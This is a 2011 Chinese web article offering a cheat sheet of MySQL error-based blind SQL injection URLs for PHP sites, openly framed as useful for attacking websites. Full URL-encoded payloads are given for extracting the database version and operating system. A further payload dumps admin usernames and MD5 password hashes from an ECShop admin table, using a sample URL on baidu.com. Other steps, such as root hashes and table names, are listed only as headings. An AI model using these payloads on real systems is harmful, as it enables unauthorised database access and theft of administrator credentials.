你的位置:聚盟网 >> 网络学院 >> 防护 >> 详细内容 在线投稿

PHP盲注常用语句

www.juoooo.com  2011年10月22日19:49  来源: 互联网   查看:   我要评论(0)  收藏  字号: TTT
整理了一些盲注语句,有时候搞站的时候用的着。希望对大家也有用,大牛小牛们用的着就尽管拿吧。
判断版本号:
http://www.baidu.com/tmd.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
判断系统
http://www.baidu.com/tmd.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
当前 user()
当前 database()
暴root hash
当前 数据库表名
当前 数据库 user_name 字段
当前 数据库 字段 password
获得 admin passwd(md5)
http://www.baidu.com/tmd.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

编辑: 伊小露
分享到:
顶:61 踩:66
【已经有428人表态】
62票
超赞
54票
震惊
48票
不解
54票
愤怒
46票
支持
64票
高兴
47票
无聊
53票
杯具
发表评论

网友评论仅供网友表达个人看法,并不表明本网同意其观点或证实其描述。

查看全部回复【已有0位网友发表了看法】
糗事吧 牛吧 私房话 经典吧
祝福墙许愿墙
随手记-天天记帐本
邀请达人
2013祝福短信,节日祝福语